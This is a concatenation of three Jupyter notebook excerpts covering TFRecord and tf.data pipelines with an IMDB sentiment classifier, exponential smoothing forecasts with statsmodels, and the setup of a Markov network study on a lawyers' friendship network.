(X_train_full, y_train_full), (X_test, y_test) = keras.datasets.fashion_mnist.load_data()
X_valid, X_train = X_train_full[:5000], X_train_full[5000:]
y_valid, y_train = y_train_full[:5000], y_train_full[5000:]
keras.backend.clear_session()
np.random.seed(42)
tf.random.set_seed(42)
train_set = tf.data.Dataset.from_tensor_slices((X_train, y_train)).shuffle(len(X_train))
valid_set = tf.data.Dataset.from_tensor_slices((X_valid, y_valid))
test_set = tf.data.Dataset.from_tensor_slices((X_test, y_test))
def create_example(image, label):
image_data = tf.io.serialize_tensor(image)
#image_data = tf.io.encode_jpeg(image[..., np.newaxis])
return Example(
features=Features(
feature={
"image": Feature(bytes_list=BytesList(value=[image_data.numpy()])),
"label": Feature(int64_list=Int64List(value=[label])),
}))
for image, label in valid_set.take(1):
print(create_example(image, label))
```
The following function saves a given dataset to a set of TFRecord files. The examples are written to the files in a round-robin fashion. To do this, we enumerate all the examples using the `dataset.enumerate()` method, and we compute `index % n_shards` to decide which file to write to. We use the standard `contextlib.ExitStack` class to make sure that all writers are properly closed whether or not an I/O error occurs while writing.
```
from contextlib import ExitStack
def write_tfrecords(name, dataset, n_shards=10):
paths = ["{}.tfrecord-{:05d}-of-{:05d}".format(name, index, n_shards)
for index in range(n_shards)]
with ExitStack() as stack:
writers = [stack.enter_context(tf.io.TFRecordWriter(path))
for path in paths]
for index, (image, label) in dataset.enumerate():
shard = index % n_shards
example = create_example(image, label)
writers[shard].write(example.SerializeToString())
return paths
train_filepaths = write_tfrecords("my_fashion_mnist.train", train_set)
valid_filepaths = write_tfrecords("my_fashion_mnist.valid", valid_set)
test_filepaths = write_tfrecords("my_fashion_mnist.test", test_set)
```
### b.
_Exercise: Then use tf.data to create an efficient dataset for each set. Finally, use a Keras model to train these datasets, including a preprocessing layer to standardize each input feature. Try to make the input pipeline as efficient as possible, using TensorBoard to visualize profiling data._
```
def preprocess(tfrecord):
feature_descriptions = {
"image": tf.io.FixedLenFeature([], tf.string, default_value=""),
"label": tf.io.FixedLenFeature([], tf.int64, default_value=-1)
}
example = tf.io.parse_single_example(tfrecord, feature_descriptions)
image = tf.io.parse_tensor(example["image"], out_type=tf.uint8)
#image = tf.io.decode_jpeg(example["image"])
image = tf.reshape(image, shape=[28, 28])
return image, example["label"]
def mnist_dataset(filepaths, n_read_threads=5, shuffle_buffer_size=None,
n_parse_threads=5, batch_size=32, cache=True):
dataset = tf.data.TFRecordDataset(filepaths,
num_parallel_reads=n_read_threads)
if cache:
dataset = dataset.cache()
if shuffle_buffer_size:
dataset = dataset.shuffle(shuffle_buffer_size)
dataset = dataset.map(preprocess, num_parallel_calls=n_parse_threads)
dataset = dataset.batch(batch_size)
return dataset.prefetch(1)
train_set = mnist_dataset(train_filepaths, shuffle_buffer_size=60000)
valid_set = mnist_dataset(valid_filepaths)
test_set = mnist_dataset(test_filepaths)
for X, y in train_set.take(1):
for i in range(5):
plt.subplot(1, 5, i + 1)
plt.imshow(X[i].numpy(), cmap="binary")
plt.axis("off")
plt.title(str(y[i].numpy()))
keras.backend.clear_session()
tf.random.set_seed(42)
np.random.seed(42)
class Standardization(keras.layers.Layer):
def adapt(self, data_sample):
self.means_ = np.mean(data_sample, axis=0, keepdims=True)
self.stds_ = np.std(data_sample, axis=0, keepdims=True)
def call(self, inputs):
return (inputs - self.means_) / (self.stds_ + keras.backend.epsilon())
standardization = Standardization(input_shape=[28, 28])
# or perhaps soon:
#standardization = keras.layers.Normalization()
sample_image_batches = train_set.take(100).map(lambda image, label: image)
sample_images = np.concatenate(list(sample_image_batches.as_numpy_iterator()),
axis=0).astype(np.float32)
standardization.adapt(sample_images)
model = keras.models.Sequential([
standardization,
keras.layers.Flatten(),
keras.layers.Dense(100, activation="relu"),
keras.layers.Dense(10, activation="softmax")
])
model.compile(loss="sparse_categorical_crossentropy",
optimizer="nadam", metrics=["accuracy"])
from datetime import datetime
logs = os.path.join(os.curdir, "my_logs",
"run_" + datetime.now().strftime("%Y%m%d_%H%M%S"))
tensorboard_cb = tf.keras.callbacks.TensorBoard(
log_dir=logs, histogram_freq=1, profile_batch=10)
model.fit(train_set, epochs=5, validation_data=valid_set,
callbacks=[tensorboard_cb])
```
**Warning:** The profiling tab in TensorBoard works if you use TensorFlow 2.2+. You also need to make sure `tensorboard_plugin_profile` is installed (and restart Jupyter if necessary).
```
%load_ext tensorboard
%tensorboard --logdir=./my_logs --port=6006
```
## 10.
_Exercise: In this exercise you will download a dataset, split it, create a `tf.data.Dataset` to load it and preprocess it efficiently, then build and train a binary classification model containing an `Embedding` layer._
### a.
_Exercise: Download the [Large Movie Review Dataset](https://homl.info/imdb), which contains 50,000 movies reviews from the [Internet Movie Database](https://imdb.com/). The data is organized in two directories, `train` and `test`, each containing a `pos` subdirectory with 12,500 positive reviews and a `neg` subdirectory with 12,500 negative reviews. Each review is stored in a separate text file. There are other files and folders (including preprocessed bag-of-words), but we will ignore them in this exercise._
```
from pathlib import Path
DOWNLOAD_ROOT = "http://ai.stanford.edu/~amaas/data/sentiment/"
FILENAME = "aclImdb_v1.tar.gz"
filepath = keras.utils.get_file(FILENAME, DOWNLOAD_ROOT + FILENAME, extract=True)
path = Path(filepath).parent / "aclImdb"
path
for name, subdirs, files in os.walk(path):
indent = len(Path(name).parts) - len(path.parts)
print(" " * indent + Path(name).parts[-1] + os.sep)
for index, filename in enumerate(sorted(files)):
if index == 3:
print(" " * (indent + 1) + "...")
break
print(" " * (indent + 1) + filename)
def review_paths(dirpath):
return [str(path) for path in dirpath.glob("*.txt")]
train_pos = review_paths(path / "train" / "pos")
train_neg = review_paths(path / "train" / "neg")
test_valid_pos = review_paths(path / "test" / "pos")
test_valid_neg = review_paths(path / "test" / "neg")
len(train_pos), len(train_neg), len(test_valid_pos), len(test_valid_neg)
```
### b.
_Exercise: Split the test set into a validation set (15,000) and a test set (10,000)._
```
np.random.shuffle(test_valid_pos)
test_pos = test_valid_pos[:5000]
test_neg = test_valid_neg[:5000]
valid_pos = test_valid_pos[5000:]
valid_neg = test_valid_neg[5000:]
```
### c.
_Exercise: Use tf.data to create an efficient dataset for each set._
Since the dataset fits in memory, we can just load all the data using pure Python code and use `tf.data.Dataset.from_tensor_slices()`:
```
def imdb_dataset(filepaths_positive, filepaths_negative):
reviews = []
labels = []
for filepaths, label in ((filepaths_negative, 0), (filepaths_positive, 1)):
for filepath in filepaths:
with open(filepath) as review_file:
reviews.append(review_file.read())
labels.append(label)
return tf.data.Dataset.from_tensor_slices(
(tf.constant(reviews), tf.constant(labels)))
for X, y in imdb_dataset(train_pos, train_neg).take(3):
print(X)
print(y)
print()
%timeit -r1 for X, y in imdb_dataset(train_pos, train_neg).repeat(10): pass
```
It takes about 17 seconds to load the dataset and go through it 10 times.
But let's pretend the dataset does not fit in memory, just to make things more interesting. Luckily, each review fits on just one line (they use `<br />` to indicate line breaks), so we can read the reviews using a `TextLineDataset`. If they didn't we would have to preprocess the input files (e.g., converting them to TFRecords). For very large datasets, it would make sense to use a tool like Apache Beam for that.
```
def imdb_dataset(filepaths_positive, filepaths_negative, n_read_threads=5):
dataset_neg = tf.data.TextLineDataset(filepaths_negative,
num_parallel_reads=n_read_threads)
dataset_neg = dataset_neg.map(lambda review: (review, 0))
dataset_pos = tf.data.TextLineDataset(filepaths_positive,
num_parallel_reads=n_read_threads)
dataset_pos = dataset_pos.map(lambda review: (review, 1))
return tf.data.Dataset.concatenate(dataset_pos, dataset_neg)
%timeit -r1 for X, y in imdb_dataset(train_pos, train_neg).repeat(10): pass
```
Now it takes about 33 seconds to go through the dataset 10 times. That's much slower, essentially because the dataset is not cached in RAM, so it must be reloaded at each epoch. If you add `.cache()` just before `.repeat(10)`, you will see that this implementation will be about as fast as the previous one.
```
%timeit -r1 for X, y in imdb_dataset(train_pos, train_neg).cache().repeat(10): pass
batch_size = 32
train_set = imdb_dataset(train_pos, train_neg).shuffle(25000).batch(batch_size).prefetch(1)
valid_set = imdb_dataset(valid_pos, valid_neg).batch(batch_size).prefetch(1)
test_set = imdb_dataset(test_pos, test_neg).batch(batch_size).prefetch(1)
```
### d.
_Exercise: Create a binary classification model, using a `TextVectorization` layer to preprocess each review. If the `TextVectorization` layer is not yet available (or if you like a challenge), try to create your own custom preprocessing layer: you can use the functions in the `tf.strings` package, for example `lower()` to make everything lowercase, `regex_replace()` to replace punctuation with spaces, and `split()` to split words on spaces. You should use a lookup table to output word indices, which must be prepared in the `adapt()` method._
Let's first write a function to preprocess the reviews, cropping them to 300 characters, converting them to lower case, then replacing `<br />` and all non-letter characters to spaces, splitting the reviews into words, and finally padding or cropping each review so it ends up with exactly `n_words` tokens:
```
def preprocess(X_batch, n_words=50):
shape = tf.shape(X_batch) * tf.constant([1, 0]) + tf.constant([0, n_words])
Z = tf.strings.substr(X_batch, 0, 300)
Z = tf.strings.lower(Z)
Z = tf.strings.regex_replace(Z, b"<br\\s*/?>", b" ")
Z = tf.strings.regex_replace(Z, b"[^a-z]", b" ")
Z = tf.strings.split(Z)
return Z.to_tensor(shape=shape, default_value=b"<pad>")
X_example = tf.constant(["It's a great, great movie! I loved it.", "It was terrible, run away!!!"])
preprocess(X_example)
```
Now let's write a second utility function that will take a data sample with the same format as the output of the `preprocess()` function, and will output the list of the top `max_size` most frequent words, ensuring that the padding token is first:
```
from collections import Counter
def get_vocabulary(data_sample, max_size=1000):
preprocessed_reviews = preprocess(data_sample).numpy()
counter = Counter()
for words in preprocessed_reviews:
for word in words:
if word != b"<pad>":
counter[word] += 1
return [b"<pad>"] + [word for word, count in counter.most_common(max_size)]
get_vocabulary(X_example)
```
Now we are ready to create the `TextVectorization` layer. Its constructor just saves the hyperparameters (`max_vocabulary_size` and `n_oov_buckets`). The `adapt()` method computes the vocabulary using the `get_vocabulary()` function, then it builds a `StaticVocabularyTable` (see Chapter 16 for more details). The `call()` method preprocesses the reviews to get a padded list of words for each review, then it uses the `StaticVocabularyTable` to lookup the index of each word in the vocabulary:
```
class TextVectorization(keras.layers.Layer):
def __init__(self, max_vocabulary_size=1000, n_oov_buckets=100, dtype=tf.string, **kwargs):
super().__init__(dtype=dtype, **kwargs)
self.max_vocabulary_size = max_vocabulary_size
self.n_oov_buckets = n_oov_buckets
def adapt(self, data_sample):
self.vocab = get_vocabulary(data_sample, self.max_vocabulary_size)
words = tf.constant(self.vocab)
word_ids = tf.range(len(self.vocab), dtype=tf.int64)
vocab_init = tf.lookup.KeyValueTensorInitializer(words, word_ids)
self.table = tf.lookup.StaticVocabularyTable(vocab_init, self.n_oov_buckets)
def call(self, inputs):
preprocessed_inputs = preprocess(inputs)
return self.table.lookup(preprocessed_inputs)
```
Let's try it on our small `X_example` we defined earlier:
```
text_vectorization = TextVectorization()
text_vectorization.adapt(X_example)
text_vectorization(X_example)
```
Looks good! As you can see, each review was cleaned up and tokenized, then each word was encoded as its index in the vocabulary (all the 0s correspond to the `<pad>` tokens).
Now let's create another `TextVectorization` layer and let's adapt it to the full IMDB training set (if the training set did not fit in RAM, we could just use a smaller sample of the training set by calling `train_set.take(500)`):
```
max_vocabulary_size = 1000
n_oov_buckets = 100
sample_review_batches = train_set.map(lambda review, label: review)
sample_reviews = np.concatenate(list(sample_review_batches.as_numpy_iterator()),
axis=0)
text_vectorization = TextVectorization(max_vocabulary_size, n_oov_buckets,
input_shape=[])
text_vectorization.adapt(sample_reviews)
```
Let's run it on the same `X_example`, just to make sure the word IDs are larger now, since the vocabulary is bigger:
```
text_vectorization(X_example)
```
Good! Now let's take a look at the first 10 words in the vocabulary:
```
text_vectorization.vocab[:10]
```
These are the most common words in the reviews.
Now to build our model we will need to encode all these word IDs somehow. One approach is to create bags of words: for each review, and for each word in the vocabulary, we count the number of occurences of that word in the review. For example:
```
simple_example = tf.constant([[1, 3, 1, 0, 0], [2, 2, 0, 0, 0]])
tf.reduce_sum(tf.one_hot(simple_example, 4), axis=1)
```
The first review has 2 times the word 0, 2 times the word 1, 0 times the word 2, and 1 time the word 3, so its bag-of-words representation is `[2, 2, 0, 1]`. Similarly, the second review has 3 times the word 0, 0 times the word 1, and so on. Let's wrap this logic in a small custom layer, and let's test it. We'll drop the counts for the word 0, since this corresponds to the `<pad>` token, which we don't care about.
```
class BagOfWords(keras.layers.Layer):
def __init__(self, n_tokens, dtype=tf.int32, **kwargs):
super().__init__(dtype=dtype, **kwargs)
self.n_tokens = n_tokens
def call(self, inputs):
one_hot = tf.one_hot(inputs, self.n_tokens)
return tf.reduce_sum(one_hot, axis=1)[:, 1:]
```
Let's test it:
```
bag_of_words = BagOfWords(n_tokens=4)
bag_of_words(simple_example)
```
It works fine! Now let's create another `BagOfWord` with the right vocabulary size for our training set:
```
n_tokens = max_vocabulary_size + n_oov_buckets + 1 # add 1 for <pad>
bag_of_words = BagOfWords(n_tokens)
```
We're ready to train the model!
```
model = keras.models.Sequential([
text_vectorization,
bag_of_words,
keras.layers.Dense(100, activation="relu"),
keras.layers.Dense(1, activation="sigmoid"),
])
model.compile(loss="binary_crossentropy", optimizer="nadam",
metrics=["accuracy"])
model.fit(train_set, epochs=5, validation_data=valid_set)
```
We get about 73.5% accuracy on the validation set after just the first epoch, but after that the model makes no significant progress. We will do better in Chapter 16. For now the point is just to perform efficient preprocessing using `tf.data` and Keras preprocessing layers.
### e.
_Exercise: Add an `Embedding` layer and compute the mean embedding for each review, multiplied by the square root of the number of words (see Chapter 16). This rescaled mean embedding can then be passed to the rest of your model._
To compute the mean embedding for each review, and multiply it by the square root of the number of words in that review, we will need a little function. For each sentence, this function needs to compute $M \times \sqrt N$, where $M$ is the mean of all the word embeddings in the sentence (excluding padding tokens), and $N$ is the number of words in the sentence (also excluding padding tokens). We can rewrite $M$ as $\dfrac{S}{N}$, where $S$ is the sum of all word embeddings (it does not matter whether or not we include the padding tokens in this sum, since their representation is a zero vector). So the function must return $M \times \sqrt N = \dfrac{S}{N} \times \sqrt N = \dfrac{S}{\sqrt N \times \sqrt N} \times \sqrt N= \dfrac{S}{\sqrt N}$.
```
def compute_mean_embedding(inputs):
not_pad = tf.math.count_nonzero(inputs, axis=-1)
n_words = tf.math.count_nonzero(not_pad, axis=-1, keepdims=True)
sqrt_n_words = tf.math.sqrt(tf.cast(n_words, tf.float32))
return tf.reduce_sum(inputs, axis=1) / sqrt_n_words
another_example = tf.constant([[[1., 2., 3.], [4., 5., 0.], [0., 0., 0.]],
[[6., 0., 0.], [0., 0., 0.], [0., 0., 0.]]])
compute_mean_embedding(another_example)
```
Let's check that this is correct. The first review contains 2 words (the last token is a zero vector, which represents the `<pad>` token). Let's compute the mean embedding for these 2 words, and multiply the result by the square root of 2:
```
tf.reduce_mean(another_example[0:1, :2], axis=1) * tf.sqrt(2.)
```
Looks good! Now let's check the second review, which contains just one word (we ignore the two padding tokens):
```
tf.reduce_mean(another_example[1:2, :1], axis=1) * tf.sqrt(1.)
```
Perfect. Now we're ready to train our final model. It's the same as before, except we replaced the `BagOfWords` layer with an `Embedding` layer followed by a `Lambda` layer that calls the `compute_mean_embedding` layer:
```
embedding_size = 20
model = keras.models.Sequential([
text_vectorization,
keras.layers.Embedding(input_dim=n_tokens,
output_dim=embedding_size,
mask_zero=True), # <pad> tokens => zero vectors
keras.layers.Lambda(compute_mean_embedding),
keras.layers.Dense(100, activation="relu"),
keras.layers.Dense(1, activation="sigmoid"),
])
```
### f.
_Exercise: Train the model and see what accuracy you get. Try to optimize your pipelines to make training as fast as possible._
```
model.compile(loss="binary_crossentropy", optimizer="nadam", metrics=["accuracy"])
model.fit(train_set, epochs=5, validation_data=valid_set)
```
The model is not better using embeddings (but we will do better in Chapter 16). The pipeline looks fast enough (we optimized it earlier).
### g.
_Exercise: Use TFDS to load the same dataset more easily: `tfds.load("imdb_reviews")`._
```
import tensorflow_datasets as tfds
datasets = tfds.load(name="imdb_reviews")
train_set, test_set = datasets["train"], datasets["test"]
for example in train_set.take(1):
print(example["text"])
print(example["label"])
```
| github_jupyter |
# Tutorial
Let us consider chapter 7 of the excellent treatise on the subject of Exponential Smoothing By Hyndman and Athanasopoulos [1].
We will work through all the examples in the chapter as they unfold.
[1] [Hyndman, Rob J., and George Athanasopoulos. Forecasting: principles and practice. OTexts, 2014.](https://www.otexts.org/fpp/7)
# Exponential smoothing
First we load some data. We have included the R data in the notebook for expedience.
```
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from statsmodels.tsa.api import ExponentialSmoothing, SimpleExpSmoothing, Holt
data = [446.6565, 454.4733, 455.663 , 423.6322, 456.2713, 440.5881, 425.3325, 485.1494, 506.0482, 526.792 , 514.2689, 494.211 ]
index= pd.DatetimeIndex(start='1996', end='2008', freq='A')
oildata = pd.Series(data, index)
oildata.index = pd.DatetimeIndex(oildata.index, freq=pd.infer_freq(oildata.index))
data = [17.5534, 21.86 , 23.8866, 26.9293, 26.8885, 28.8314, 30.0751, 30.9535, 30.1857, 31.5797, 32.5776, 33.4774, 39.0216, 41.3864, 41.5966]
index= pd.DatetimeIndex(start='1990', end='2005', freq='A')
air = pd.Series(data, index)
air.index = pd.DatetimeIndex(air.index, freq=pd.infer_freq(air.index))
data = [263.9177, 268.3072, 260.6626, 266.6394, 277.5158, 283.834 , 290.309 , 292.4742, 300.8307, 309.2867, 318.3311, 329.3724, 338.884 , 339.2441, 328.6006, 314.2554, 314.4597, 321.4138, 329.7893, 346.3852, 352.2979, 348.3705, 417.5629, 417.1236, 417.7495, 412.2339, 411.9468, 394.6971, 401.4993, 408.2705, 414.2428]
index= pd.DatetimeIndex(start='1970', end='2001', freq='A')
livestock2 = pd.Series(data, index)
livestock2.index = pd.DatetimeIndex(livestock2.index, freq=pd.infer_freq(livestock2.index))
data = [407.9979 , 403.4608, 413.8249, 428.105 , 445.3387, 452.9942, 455.7402]
index= pd.DatetimeIndex(start='2001', end='2008', freq='A')
livestock3 = pd.Series(data, index)
livestock3.index = pd.DatetimeIndex(livestock3.index, freq=pd.infer_freq(livestock3.index))
data = [41.7275, 24.0418, 32.3281, 37.3287, 46.2132, 29.3463, 36.4829, 42.9777, 48.9015, 31.1802, 37.7179, 40.4202, 51.2069, 31.8872, 40.9783, 43.7725, 55.5586, 33.8509, 42.0764, 45.6423, 59.7668, 35.1919, 44.3197, 47.9137]
index= pd.DatetimeIndex(start='2005', end='2010-Q4', freq='QS')
aust = pd.Series(data, index)
aust.index = pd.DatetimeIndex(aust.index, freq=pd.infer_freq(aust.index))
```
## Simple Exponential Smoothing
Lets use Simple Exponential Smoothing to forecast the below oil data.
```
ax=oildata.plot()
ax.set_xlabel("Year")
ax.set_ylabel("Oil (millions of tonnes)")
plt.show()
print("Figure 7.1: Oil production in Saudi Arabia from 1996 to 2007.")
```
Here we run three variants of simple exponential smoothing:
1. In ```fit1``` we do not use the auto optimization but instead choose to explicitly provide the model with the $\alpha=0.2$ parameter
2. In ```fit2``` as above we choose an $\alpha=0.6$
3. In ```fit3``` we allow statsmodels to automatically find an optimized $\alpha$ value for us. This is the recommended approach.
```
fit1 = SimpleExpSmoothing(oildata).fit(smoothing_level=0.2,optimized=False)
fcast1 = fit1.forecast(3).rename(r'$\alpha=0.2$')
fit2 = SimpleExpSmoothing(oildata).fit(smoothing_level=0.6,optimized=False)
fcast2 = fit2.forecast(3).rename(r'$\alpha=0.6$')
fit3 = SimpleExpSmoothing(oildata).fit()
fcast3 = fit3.forecast(3).rename(r'$\alpha=%s$'%fit3.model.params['smoothing_level'])
ax = oildata.plot(marker='o', color='black', figsize=(12,8))
fcast1.plot(marker='o', ax=ax, color='blue', legend=True)
fit1.fittedvalues.plot(marker='o', ax=ax, color='blue')
fcast2.plot(marker='o', ax=ax, color='red', legend=True)
fit2.fittedvalues.plot(marker='o', ax=ax, color='red')
fcast3.plot(marker='o', ax=ax, color='green', legend=True)
fit3.fittedvalues.plot(marker='o', ax=ax, color='green')
plt.show()
```
## Holt's Method
Lets take a look at another example.
This time we use air pollution data and the Holt's Method.
We will fit three examples again.
1. In ```fit1``` we again choose not to use the optimzer and provide explicit values for $\alpha=0.8$ and $\beta=0.2$
2. In ```fit2``` we do the same as in ```fit1``` but choose to use an exponential model rather than a Holt's additive model.
3. In ```fit3``` we used a damped versions of the Holt's additive model but allow the dampening parameter $\phi$ to be optimized while fixing the values for $\alpha=0.8$ and $\beta=0.2$
```
fit1 = Holt(air).fit(smoothing_level=0.8, smoothing_slope=0.2, optimized=False)
fcast1 = fit1.forecast(5).rename("Holt's linear trend")
fit2 = Holt(air, exponential=True).fit(smoothing_level=0.8, smoothing_slope=0.2, optimized=False)
fcast2 = fit2.forecast(5).rename("Exponential trend")
fit3 = Holt(air, damped=True).fit(smoothing_level=0.8, smoothing_slope=0.2)
fcast3 = fit3.forecast(5).rename("Additive damped trend")
ax = air.plot(color="black", marker="o", figsize=(12,8))
fit1.fittedvalues.plot(ax=ax, color='blue')
fcast1.plot(ax=ax, color='blue', marker="o", legend=True)
fit2.fittedvalues.plot(ax=ax, color='red')
fcast2.plot(ax=ax, color='red', marker="o", legend=True)
fit3.fittedvalues.plot(ax=ax, color='green')
fcast3.plot(ax=ax, color='green', marker="o", legend=True)
plt.show()
```
### Seasonally adjusted data
Lets look at some seasonally adjusted livestock data. We fit five Holt's models.
The below table allows us to compare results when we use exponential versus additive and damped versus non-damped.
Note: ```fit4``` does not allow the parameter $\phi$ to be otpimized by providing a fixed value of $\phi=0.98$
```
fit1 = SimpleExpSmoothing(livestock2).fit()
fit2 = Holt(livestock2).fit()
fit3 = Holt(livestock2,exponential=True).fit()
fit4 = Holt(livestock2,damped=True).fit(damping_slope=0.98)
fit5 = Holt(livestock2,exponential=True,damped=True).fit()
params = ['smoothing_level', 'smoothing_slope', 'damping_slope', 'initial_level', 'initial_slope']
results=pd.DataFrame(index=[r"$\alpha$",r"$\beta$",r"$\phi$",r"$l_0$","$b_0$","SSE"] ,columns=['SES', "Holt's","Exponential", "Additive", "Multiplicative"])
results["SES"] = [fit1.params[p] for p in params] + [fit1.sse]
results["Holt's"] = [fit2.params[p] for p in params] + [fit2.sse]
results["Exponential"] = [fit3.params[p] for p in params] + [fit3.sse]
results["Additive"] = [fit4.params[p] for p in params] + [fit4.sse]
results["Multiplicative"] = [fit5.params[p] for p in params] + [fit5.sse]
results
```
### Plots of Seasonally Adjusted Data
The following plots allow us to evaluate the level and slope/trend components of the above table's fits.
```
for fit in [fit2,fit4]:
pd.DataFrame(np.c_[fit.level,fit.slope]).rename(
columns={0:'level',1:'slope'}).plot(subplots=True)
plt.show()
print('Figure 7.4: Level and slope components for Holt’s linear trend method and the additive damped trend method.')
```
## Comparison
Here we plot a comparison Simple Exponential Smoothing and Holt's Methods for various additive, exponential and damped combinations. All of the models parameters will be optimized by statsmodels.
```
fit1 = SimpleExpSmoothing(livestock2).fit()
fcast1 = fit1.forecast(9).rename("SES")
fit2 = Holt(livestock2).fit()
fcast2 = fit2.forecast(9).rename("Holt's")
fit3 = Holt(livestock2, exponential=True).fit()
fcast3 = fit3.forecast(9).rename("Exponential")
fit4 = Holt(livestock2, damped=True).fit(damping_slope=0.98)
fcast4 = fit4.forecast(9).rename("Additive Damped")
fit5 = Holt(livestock2, exponential=True, damped=True).fit()
fcast5 = fit5.forecast(9).rename("Multiplicative Damped")
ax = livestock2.plot(color="black", marker="o", figsize=(12,8))
livestock3.plot(ax=ax, color="black", marker="o", legend=False)
fcast1.plot(ax=ax, color='red', legend=True)
fcast2.plot(ax=ax, color='green', legend=True)
fcast3.plot(ax=ax, color='blue', legend=True)
fcast4.plot(ax=ax, color='cyan', legend=True)
fcast5.plot(ax=ax, color='magenta', legend=True)
ax.set_ylabel('Livestock, sheep in Asia (millions)')
plt.show()
print('Figure 7.5: Forecasting livestock, sheep in Asia: comparing forecasting performance of non-seasonal methods.')
```
## Holt's Winters Seasonal
Finally we are able to run full Holt's Winters Seasonal Exponential Smoothing including a trend component and a seasonal component.
Statsmodels allows for all the combinations including as shown in the examples below:
1. ```fit1``` additive trend, additive seasonal of period ```season_length=4``` and the use of a Boxcox transformation.
1. ```fit2``` additive trend, multiplicative seasonal of period ```season_length=4``` and the use of a Boxcox transformation..
1. ```fit3``` additive damped trend, additive seasonal of period ```season_length=4``` and the use of a boxcox transformation.
1. ```fit4``` additive damped trend, multiplicative seasonal of period ```season_length=4``` and the use of a boxcox transformation.
The plot shows the results and forecast for ```fit1``` and ```fit2```.
The table allows us to compare the results and parameterizations.
```
fit1 = ExponentialSmoothing(aust, seasonal_periods=4, trend='add', seasonal='add').fit(use_boxcox=True)
fit2 = ExponentialSmoothing(aust, seasonal_periods=4, trend='add', seasonal='mul').fit(use_boxcox=True)
fit3 = ExponentialSmoothing(aust, seasonal_periods=4, trend='add', seasonal='add', damped=True).fit(use_boxcox=True)
fit4 = ExponentialSmoothing(aust, seasonal_periods=4, trend='add', seasonal='mul', damped=True).fit(use_boxcox=True)
results=pd.DataFrame(index=[r"$\alpha$",r"$\beta$",r"$\phi$",r"$\gamma$",r"$l_0$","$b_0$","SSE"])
params = ['smoothing_level', 'smoothing_slope', 'damping_slope', 'smoothing_seasonal', 'initial_level', 'initial_slope']
results["Additive"] = [fit1.params[p] for p in params] + [fit1.sse]
results["Multiplicative"] = [fit2.params[p] for p in params] + [fit2.sse]
results["Additive Dam"] = [fit3.params[p] for p in params] + [fit3.sse]
results["Multiplica Dam"] = [fit4.params[p] for p in params] + [fit4.sse]
ax = aust.plot(figsize=(10,6), marker='o', color='black', title="Forecasts from Holt-Winters' multiplicative method" )
ax.set_ylabel("International visitor night in Australia (millions)")
ax.set_xlabel("Year")
fit1.fittedvalues.plot(ax=ax, style='--', color='red')
fit2.fittedvalues.plot(ax=ax, style='--', color='green')
fit1.forecast(8).plot(ax=ax, style='--', marker='o', color='red', legend=True)
fit2.forecast(8).plot(ax=ax, style='--', marker='o', color='green', legend=True)
plt.show()
print("Figure 7.6: Forecasting international visitor nights in Australia using Holt-Winters method with both additive and multiplicative seasonality.")
results
```
### The Internals
It is possible to get at the internals of the Exponential Smoothing models.
Here we show some tables that allow you to view side by side the original values $y_t$, the level $l_t$, the trend $b_t$, the season $s_t$ and the fitted values $\hat{y}_t$.
```
pd.DataFrame(np.c_[aust, fit1.level, fit1.slope, fit1.season, fit1.fittedvalues],
columns=[r'$y_t$',r'$l_t$',r'$b_t$',r'$s_t$',r'$\hat{y}_t$'],index=aust.index). \
append(fit1.forecast(8).rename(r'$\hat{y}_t$').to_frame())
pd.DataFrame(np.c_[aust, fit2.level, fit2.slope, fit2.season, fit2.fittedvalues],
columns=[r'$y_t$',r'$l_t$',r'$b_t$',r'$s_t$',r'$\hat{y}_t$'],index=aust.index). \
append(fit2.forecast(8).rename(r'$\hat{y}_t$').to_frame())
```
Finally lets look at the levels, slopes/trends and seasonal components of the models.
```
states1 = pd.DataFrame(np.c_[fit1.level, fit1.slope, fit1.season], columns=['level','slope','seasonal'], index=aust.index)
states2 = pd.DataFrame(np.c_[fit2.level, fit2.slope, fit2.season], columns=['level','slope','seasonal'], index=aust.index)
fig, [[ax1, ax4],[ax2, ax5], [ax3, ax6]] = plt.subplots(3, 2, figsize=(12,8))
states1[['level']].plot(ax=ax1)
states1[['slope']].plot(ax=ax2)
states1[['seasonal']].plot(ax=ax3)
states2[['level']].plot(ax=ax4)
states2[['slope']].plot(ax=ax5)
states2[['seasonal']].plot(ax=ax6)
plt.show()
```
| github_jupyter |
# Self Study 4
In this self study we implement and test a simple Markov network model for node prediction, and a Gibbs sampling inference (prediction) process.
For this material there is no direct support from scikit learn, so we have to do a little more coding ourselves than before ...
For basic network functionalities we use the `networkx` package: https://networkx.github.io/documentation/stable/index.html
```
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import networkx as nx
from networkx import read_edgelist
import random
```
We are using a social network consisting of 71 lawyers. A description of the network and the original data can be found here:
http://moreno.ss.uci.edu/data.html#lazega
Of the three different relationships included in the data we will only be using the 'friendship' relation. This is a directed relationship, i.e., friends(a,b) does not necessarily imply friends(b,a) according to the data.
We first construct a networkx graph from the file lazega-friends.edges. The node attributes are read from a separate file into a Pandas data frame:
```
lazega=read_edgelist('lazega-friends.edges',nodetype=int)
node_atts=pd.read_csv("lazega-attributes.txt", sep=' ')
print(node_atts.loc[1,'nodeGender'])
display(node_atts)
```
Now we annotate the nodes in the graph with some selected attributes (later on, if you want to do more, you can consider additional attributes).
```
for i in range(node_atts.shape[0]):
lazega.add_node(node_atts.loc[i,'nodeID'], gender=node_atts.loc[i,'nodeGender'])
lazega.add_node(node_atts.loc[i,'nodeID'], office=node_atts.loc[i,'nodeOffice'])
lazega.add_node(node_atts.loc[i,'nodeID'], true_practice=node_atts.loc[i,'nodePractice'])
if random.random() > 0.4:
lazega.add_node(node_atts.loc[i,'nodeID'], observed_practice=node_atts.loc[i,'nodePractice'])
else:
lazega.add_node(node_atts.loc[i,'nodeID'], observed_practice=np.nan)
```
The 'practice' attribute is going to be our class label that we want to predict. Therfore, we pretend that this attribute is not observed for some randomly selected nodes. We do this by adding a new attribute 'observed_practice' which has either the true practice value, or 'nan' for unobserved.
```
random.seed(5)
for i in range(node_atts.shape[0]):
if random.random() > 0.4:
lazega.add_node(node_atts.loc[i,'nodeID'], observed_practice=node_atts.loc[i,'nodePractice'])
else:
lazega.add_node(node_atts.loc[i,'nodeID'], observed_practice=np.nan)
```
The following is a utility function for retrieving a plain numpy array containing the values of a selected attribute for all nodes.
```
def get_att_array(G,att_name):
ret_array=np.zeros(nx.number_of_nodes(G))
for i,n in enumerate(G.nodes()):
ret_array[i]=G.nodes[n][att_name]
return(ret_array)
print(get_att_array(lazega,'observed_practice'))
```
**Beware:** lazega.nodes[n] returns nodes according to their key (= nodeID) value, which are the integers 1..71, whereas the arrays returned by get_att_array are indexed 0..70.
